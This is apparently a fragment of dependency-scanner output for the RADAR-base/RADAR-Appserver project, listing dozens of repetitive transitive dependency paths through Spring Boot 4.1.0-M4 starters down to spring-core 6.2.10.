Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-hibernate@4.1.0-M4 › org.springframework.boot:spring-boot-jpa@4.1.0-M4 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-jdbc@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
